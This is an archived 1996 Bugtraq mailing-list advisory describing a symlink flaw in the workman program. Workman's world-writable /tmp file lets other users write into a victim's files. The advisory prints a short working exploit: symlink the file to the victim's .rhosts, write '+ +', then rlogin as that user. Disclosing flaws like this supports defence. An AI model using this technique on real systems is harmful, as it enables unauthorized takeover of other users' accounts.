From proff  Tue Aug 27 10:44:42 1996
Received: (proff@localhost) by suburbia.net (8.7.4/Proff-950810) id KAA07824 for best-of-security; Tue, 27 Aug 1996 10:44:41 +1000
Received: from brimstone.netspace.org ([128.148.157.143]) by suburbia.net (8.7.4/Proff-950810) with ESMTP id IAA29069 for <proff@SUBURBIA.NET>; Tue, 27 Aug 1996 08:03:03 +1000
Received: from netspace.org ([128.148.157.6]) by brimstone.netspace.org with ESMTP id <24151-23817>; Mon, 26 Aug 1996 17:56:52 -0500
Received: from netspace.org (netspace [128.148.157.6]) by netspace.org (8.7/8.6.12) with SMTP id RAA13598; Mon, 26 Aug 1996 17:57:45 -0400
Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8b) with
          spool id 296960 for BUGTRAQ@NETSPACE.ORG; Mon, 26 Aug 1996 17:48:08
          -0400
Received: from netspace.org (netspace [128.148.157.6]) by netspace.org
          (8.7/8.6.12) with SMTP id RAA11655 for <BUGTRAQ@NETSPACE.ORG>; Mon,
          26 Aug 1996 17:43:04 -0400
Approved-By: ALEPH1@UNDERGROUND.ORG
Received: from amber.ccs.neu.edu (amber.ccs.neu.edu [129.10.111.100]) by
          netspace.org (8.7/8.6.12) with ESMTP id MAA09868 for
          <bugtraq@netspace.org>; Mon, 26 Aug 1996 12:21:17 -0400
Received: from pinatubo.ccs.neu.edu (pinatubo.ccs.neu.edu [129.10.113.79]) by
          amber.ccs.neu.edu (8.7.5/8.7.3) with ESMTP id MAA29681 for
          <bugtraq@netspace.org>; Mon, 26 Aug 1996 12:21:16 -0400 (EDT)
Received: (gahull@localhost) by pinatubo.ccs.neu.edu (8.7.5/8.6.4) id MAA24980
          for bugtraq@netspace.org; Mon, 26 Aug 1996 12:21:15 -0400 (EDT)
X-Mailer: ELM [version 2.4 PL23beta2]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Approved-By:  Gregory Hull <gahull@CCS.NEU.EDU>
Message-ID: <199608261621.MAA24980@pinatubo.ccs.neu.edu>
Date: 	Mon, 26 Aug 1996 12:21:15 -0400
Reply-To: Bugtraq List <BUGTRAQ@netspace.org>
Sender: proff
From: Gregory Hull <gahull@ccs.neu.edu>
Subject:      r00t advisory -- workman vunerability
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@netspace.org>

r00t advisory                                           [ workman       ]
                                                        [ Aug 25 1996   ]

-- Synposis
There exists a vunerability in workman that will allow any user to create
and write to files owned by the user who is running workman.  Workman creates
a mode 666 file in /tmp and will gladly follow a symbolic link to it's
target.

-- Exploitability
The exploit is absurdly simple:
$ ln -s /home/target_user/.rhosts /tmp/.wm_pid
# wait for target user to run workman
$ echo "+ +" >/home/target_user/.rhosts
$ rlogin -l localhost target_user

-- Fixes ?
The author of workman has been alerted to this problem and a patch is available
from ggal@ccs.neu.edu.

r00t -- http://www.r00t.org